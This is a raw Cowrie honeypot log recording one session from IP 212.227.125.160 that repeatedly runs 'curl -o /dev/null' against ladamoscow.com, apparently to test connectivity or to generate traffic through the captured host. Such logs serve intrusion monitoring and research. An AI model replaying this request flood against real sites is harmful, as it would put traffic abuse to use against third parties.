{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.217965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.254570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.255555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.292150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.293158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.329592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.330618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.367018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.368154Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.404975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.405939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.453822Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.454852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.491809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.492937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.530111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.531143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.567988Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.569080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.606898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.608495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.645674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.646716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.683300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.684354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.720901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.722209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.759197Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.760121Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.796989Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.797978Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.848966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.850177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.892828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.894034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.932898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.934093Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:53.976540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:53.977695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.024103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.025304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.063046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.063973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.103594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.104728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.142162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.143391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.181112Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.182352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.220034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.221223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.276085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.277313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.315547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.316912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.356682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.357900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.395330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.396512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.435481Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.436706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.473598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.474788Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.525822Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.527125Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.569512Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.570970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.607820Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.608958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.646834Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.648075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.697891Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.699217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.741386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.742539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.945178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.946396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:54.983552Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:54.984725Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.021713Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.022531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.059930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.061316Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.099142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.100594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.137434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.138581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.175517Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.177040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.213633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.214854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.275769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.276981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.314103Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.315531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.352398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.353600Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.391242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.392317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.430014Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.430932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.469937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.471201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.509867Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.511169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.549243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.550433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.588210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.589550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.626216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.627479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.674902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.676009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.715776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.716810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.753732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.754923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.835624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.836866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.874135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.875211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.912445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.913491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.950541Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.951617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:55.989401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:55.990708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.028379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:56.030573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:56.075009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
